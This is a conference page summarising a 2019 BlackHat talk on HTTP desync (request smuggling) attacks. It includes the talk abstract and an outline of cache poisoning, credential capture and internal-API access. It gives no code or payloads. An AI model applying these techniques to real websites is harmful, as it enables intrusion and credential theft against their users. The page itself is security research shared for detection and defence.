logo

HTTP Desync Attacks: Smashing into the Cell Next Door

Conference:  BlackHat USA 2019

2019-08-07

Summary

HTTP Desync Attacks allow remote, unauthenticated attackers to splice their requests into others, compromising web infrastructure and harvesting bug bounties. The speaker shares new tools and techniques to detect, assess, and exploit these vulnerabilities with minimal risk of collateral damage.
  • HTTP requests are traditionally viewed as isolated, standalone entities, but modern websites route requests through a chain of servers speaking to each other over HTTP over a stream-based transport layer protocol like TCP or TLS.
  • HTTP Desync Attacks occur when an attacker sends an ambiguous message that the front end interprets as one request, but the back end thinks is two separate requests, allowing the attacker to apply an arbitrary prefix to the next request to hit the back end.
  • The speaker shares case studies of exploiting real websites, delicately amending victim's requests to route them into malicious territory, invoke harmful responses, and lure credentials into their open arms.
  • The speaker also demonstrates using backend reassembly on your own requests to exploit every modicum of trust placed on the frontend, gain maximum privilege access to internal APIs, poison web caches, and compromise login pages.
  • The speaker unveils a vast expanse of vulnerable systems ranging from huge content delivery networks to bespoke backends and shares a refined methodology and open source tooling for black-box detection, assessment, and exploitation with minimal risk of collateral damage.
The speaker was initially scared to tackle HTTP Desync Attacks due to their complexity and the concerning statements surrounding them. However, after trying it out, they were able to get bounties and received interesting reactions from people, including one who thought the vulnerability was fake and another who liked the unique technique used on their website so much they tried to apply it to other bug bounty sites behind the speaker's back.

Abstract

HTTP requests are traditionally viewed as isolated, standalone entities. In this session, I'll introduce techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $50k in bug bounties.Using these targets as case studies, I'll show you how to delicately amend victim's requests to route them into malicious territory, invoke harmful responses, and lure credentials into your open arms. I'll also demonstrate using backend reassembly on your own requests to exploit every modicum of trust placed on the frontend, gain maximum privilege access to internal APIs, poison web caches, and compromise what's possibly your most trusted login page. This is an attack the web is thoroughly unprepared for. Although documented over a decade ago, a fearsome reputation for difficulty and collateral damage has left it optimistically ignored for years while the web's susceptibility grew. By applying fresh ideas and new techniques, I'll unveil a vast expanse of vulnerable systems ranging from huge content delivery networks to bespoke backends. I'll help you tackle this legacy by sharing a refined methodology and open source tooling for black-box detection, assessment and exploitation with minimal risk of collateral damage. These will be developed from core concepts, ensuring you leave equipped to devise your own desync techniques and tailor (or thwart) attacks against your target of choice.

Materials:

Tags:

Post a comment